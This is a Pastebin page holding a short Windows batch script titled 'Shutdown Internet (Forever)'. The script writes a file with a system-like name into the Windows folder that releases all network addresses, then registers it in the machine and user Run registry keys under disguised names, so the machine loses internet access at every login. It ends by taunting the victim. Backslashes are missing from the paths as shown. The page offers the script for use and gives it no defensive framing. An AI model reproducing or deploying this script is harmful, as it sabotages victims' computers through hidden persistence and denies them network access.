Advertisement
TVT618

Shutdown Internet (Forever)

Dec 14th, 2017
175
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 0.43 KB | None | 0 0
  1. echo @echo off>c:windowswimn32.bat
  2. echo break off>>c:windowswimn32.bat
  3. echo ipconfig/release_all>>c:windowswimn32.bat
  4. echo end>>c:windowswimn32.bat
  5. reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
  6. reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
  7. echo Your Internet Iยด Closed... Forever!
  8. PAUSE
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement